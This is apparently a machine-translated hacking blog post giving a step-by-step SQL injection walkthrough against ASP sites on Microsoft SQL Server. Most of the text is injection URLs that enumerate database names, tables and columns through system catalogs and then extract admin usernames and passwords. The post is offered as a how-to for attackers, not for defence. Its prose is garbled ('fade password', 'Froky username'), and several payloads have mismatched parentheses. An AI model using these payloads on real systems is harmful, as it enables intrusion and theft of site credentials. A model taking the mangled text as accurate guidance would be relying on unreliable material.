Source: Exploit's Blog
http://heijin.blogchina.com
I have seen a cross-library query written by the meal. I sorted out the generals from the branches to the fade password.
Steps make the ideas clearer.
SQL INJECTION is flexible, the injecting statement is different, the following is only available to the general
Steps, I hope to help you. 1: Four all library names.
http://www.***.com/***.asp? id = 1 and 0 <> (Select Count (*)
From master.dbo.sysdatabases where name> 1 and dbid = 6)
Submit DBID = 7, 8, 9 .... get more database name
2: Table in the outburs
Assume that there is a BBS database, submit the following statement:
http://www.***.com/jump.asp? id = 1 and 0 <> (Select Top 1 Name
From bbs.dbo.sysObjects where xtype = 'u')
Come get a table to assume as admin
submit:
http://www.***.com/jump.asp? id = 1 and 0 <> (Select Top 1 Name
From bbs.dbo.sysObjects where xtype = 'u' and name not in
('Admin')))))
Come get other forms.
3: Fields in the outset
submit:
http://www.***.com/***.asp? id = 1 and 0 <> (Select Count (*)
From bbs.dbo.sysobjects where xtype = 'u' and name = 'admin'
And Uid> (STR (ID))))))
Get the value of the UID assumption to 18779569 UID = ID
submit:
http://www.***.com/***.asp? id = 1 and 0 <> (Select Top 1 Name
From bbs.dbo.syscolumns where id = 18779569)
Get a field of Admin, assume it for user_id
submit:
http://www.***.com/***.asp? id = 1 and 0 <> (Select Top 1 Name
From bbs.dbo.syscolumns where id = 18779569 and name not in
('id', ...))
To fade other fields
4: Froky username and password, etc.
Suppose fields with user_id usrname, password, etc.
http://www.***.com/***.asp? id = 1 and 0 <(Select User_id from
Bbs.dbo.admin Where username> 1)
Can get username
You can get a password in turn. . . . .
